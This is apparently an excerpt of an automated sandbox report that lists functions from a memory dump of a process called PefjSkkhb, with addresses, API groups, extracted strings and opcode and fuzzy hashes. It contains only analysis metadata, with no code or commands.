                                                                                                                                                                                                                    Function 00007FF656CEFD20 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                                                                                                                                    • Instruction ID: 5379e05ec0eeefe04ba378191ceeacf9ef750f66694046892b890908c015306b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4F06871B182958ADB94CF2CA45262977E0E70C384F54C939D58DD3F44DE3D9460DF04
                                                                                                                                                                                                                    Function 00007FF656CD59C8 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                                                                                                                                    • Instruction ID: a3a319fff4ad5766048e5cda654f84b2f4585ef9de061684c3d2a6b4f01de2bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAA002A594EC42D4E7048B40E8500303330EB50351B9D0A73D00DE1471DF3EA4C1C350
                                                                                                                                                                                                                    Function 00007FF656D5E95C Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3521893082-0
                                                                                                                                                                                                                    • Opcode ID: 62288e6044eeb51ceaca558ce081e20657d436a920c90360f4dff7bd8b59143b
                                                                                                                                                                                                                    • Instruction ID: c359daf1fa3415ffabcd360bb0bf7f781dd1f1f77e0259697fe6ec5a45ca63de
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62288e6044eeb51ceaca558ce081e20657d436a920c90360f4dff7bd8b59143b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FA19F72F08A0286EB249B61D84457D3761FB99BA4F184B34DE2EA7BD4DF3DA484C740
                                                                                                                                                                                                                    Function 00007FF656D34F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                    • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                                                                                                                                                    • Instruction ID: 1a973d759d2b1b3ad4e02843e9e062b3382a077e552105bc0e486a53cb2e53c4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23B19B66B0CA0294EA64DB29D9540BC2361BB40BC5FAC5B31D90EF76A8DF7FE944C300
                                                                                                                                                                                                                    Function 00007FF656D5ECB4 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1996641542-0
                                                                                                                                                                                                                    • Opcode ID: 456618ac8a95d24da361eef2387faddad64259921dc32d60f8fff8d32782d413
                                                                                                                                                                                                                    • Instruction ID: 6df8fe8c9f57a307057dc3f7827dd7e445533f71cac9625cbabad9cdfdcc5a59
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 456618ac8a95d24da361eef2387faddad64259921dc32d60f8fff8d32782d413
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E719136A08A4186EB34DB25E84467A7361FBC9BA0F084735DE6E97B94DF3DE484C700
                                                                                                                                                                                                                    Function 00007FF656D56EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                    • String ID: tooltips_class32
                                                                                                                                                                                                                    • API String ID: 698492251-1918224756
                                                                                                                                                                                                                    • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                                                                                                                                                    • Instruction ID: bdd00e2c990d553c4503917cce0c729a6bda234ae72863125f4c31dea76b8a51
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BC16073A087418AEB54CF65E4842AE77B0FB98B84F540635DA5E97B64CF3EE481CB00
                                                                                                                                                                                                                    Function 00007FF656D22C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175windowtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 3869813825-2766056989
                                                                                                                                                                                                                    • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                                                                                                                                                                    • Instruction ID: 1d61cc65945fd0ef4a90a6af9146d661623bf3b0be8b950074d39e719ce26bdb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F817A32A04A4286E750CF75D95466D33A0FB84B88F488B31DE0EE7798DF3AD985C740
                                                                                                                                                                                                                    Function 00007FF656CB2620 Relevance: 28.7, APIs: 19, Instructions: 201COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$LongWindow$ModeObjectStockText
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 554392163-0
                                                                                                                                                                                                                    • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                                                                                                                                                                    • Instruction ID: 186490be616b35b6bcf755f91c6991332a856c627f356a0bbc25b72d62880b19
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B681C861D0895782EA708729D44867973B1AF897A4F9D0732CD5EE77F4DE3EA882C700
                                                                                                                                                                                                                    Function 00007FF656D2C81C Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 140COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                    • API String ID: 222038402-1459072770
                                                                                                                                                                                                                    • Opcode ID: 51fe8bcbe8e6b59723f07a7c2397ff76d424f2ff2d9e9c278db2ac18109fa396
                                                                                                                                                                                                                    • Instruction ID: d835b09efe50b3954d7544c834b4b6eaa003f6bda10d8af1d03c767c65a4f771
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51fe8bcbe8e6b59723f07a7c2397ff76d424f2ff2d9e9c278db2ac18109fa396
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C751B365B0868241EF64EB1699111B92371AF85FD0F488A31DD0EEB796DF3EE505C700
                                                                                                                                                                                                                    Function 00007FF656D56608 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 475windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                                                                                                                    • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                                                                                                                                                                    • Instruction ID: 96759b3216f7425aad831f2269f0e4887ad34ca274de37d02f929fe1230fd8e5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA12BF53B1869382EE609B65C8011BD67A0EF65B94F5C4B31DA4DE7BA5EE3FE481C300
                                                                                                                                                                                                                    Function 00007FF656D61254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                    • API String ID: 2091158083-3440237614
                                                                                                                                                                                                                    • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                                                                                                                                                    • Instruction ID: a371e38d43a6422fa2a573f69265d5c0df9072c9908412c25ddfbe58e9414e25
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C718672618A8296EB10DF15E8447ED7730FB85798F880632DE4EA7AA9CF7DD149C700
                                                                                                                                                                                                                    Function 00007FF656D33FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: SendString$BuffCharDriveLowerType
                                                                                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                    • API String ID: 1600147383-4113822522
                                                                                                                                                                                                                    • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                                                                                                                                                    • Instruction ID: 3221c2eaef6ae0616bfae0082c1eb0b7b02d76728cbd5e6a2b9f5c1408c14103
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99818C32B14A5285EB109B65D8502BC33B1FB54B98B984B31CE5DE7BA5DF3EE946C300
                                                                                                                                                                                                                    Function 00007FF656D60118 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                    • API String ID: 258715311-1154884017
                                                                                                                                                                                                                    • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                                                                                                                                                    • Instruction ID: ea6c21402c6fded0b50c7b810bc594244bb0f4574f3a824b6a4487dec092a168
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C719162A0465282EB64DF26D544AB933A4FF48B98F480B35ED1E977E4DF3EE445C700
                                                                                                                                                                                                                    Function 00007FF656D603D0 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                                                                                    • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                                                                                                                                                    • Instruction ID: bd2bc4f7aa1b84c10bec1ecab1e9cdaed9f0b0c8babac2db45cb04ab91cd2a8b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
